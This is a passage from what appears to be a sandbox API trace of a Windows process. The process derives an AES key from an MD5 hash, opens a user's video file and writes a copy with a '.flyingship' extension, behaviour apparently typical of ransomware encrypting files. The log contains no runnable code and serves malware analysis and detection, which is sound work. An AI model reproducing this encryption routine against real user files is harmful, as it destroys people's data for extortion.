wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.233] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0199.233] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.233] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.233] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.233] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.233] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.233] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0199.233] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.233] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0199.234] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.234] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.234] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0199.234] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.234] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.234] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.234] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.234] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.234] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0199.234] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.242] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.242] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.242] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.242] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.243] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.243] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0199.243] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.243] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.243] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0199.243] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.243] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.243] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0199.243] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.243] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.243] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0199.243] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.243] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.243] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.244] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.244] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.244] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.244] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.244] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0199.244] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.244] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.244] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0199.245] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.245] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.245] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.245] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.245] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0199.245] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.245] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.245] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.245] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.245] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.245] CryptHashData (hHash=0x90ae18, pbData=0x8ded08, dwDataLen=0x19, dwFlags=0x1) returned 1 [0199.246] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.246] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.246] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.246] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.246] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.246] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0199.246] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.246] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.246] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0199.247] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.247] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.247] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.247] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.247] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.247] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.247] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0199.247] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.247] CryptDestroyHash (hHash=0x90ae18) returned 1 [0199.247] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.247] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.247] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.247] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.247] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.247] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\c2l5d8zfcqafr.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0199.249] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.249] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0199.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0199.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0199.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0199.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0199.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0199.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0199.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0199.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.249] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0199.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0199.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0199.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0199.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0199.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0199.250] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0199.250] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0199.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0199.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0199.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0199.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0199.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0199.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0199.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0199.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0199.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0199.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0199.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0199.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0199.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0199.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0199.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0199.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0199.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0199.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0199.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0199.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0199.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0199.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0199.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0199.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0199.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0199.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0199.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0199.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0199.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0199.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0199.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0199.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fff18 [0199.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0199.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0199.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0199.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0199.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0199.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0199.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0199.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0199.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0199.252] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth")) returned 0x10 [0199.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0199.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff18 | out: hHeap=0x8a0000) returned 1 [0199.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0199.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0199.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0199.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0199.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0199.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0199.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0199.253] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.flyingship.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\c2l5d8zfcqafr.flyingship.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0199.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0199.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0199.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0199.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0199.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0199.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0199.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0199.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.254] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0199.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0199.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0199.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0199.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0199.255] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0199.255] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0199.255] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0199.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0199.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0199.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0199.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0199.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0199.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0199.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0199.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0199.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 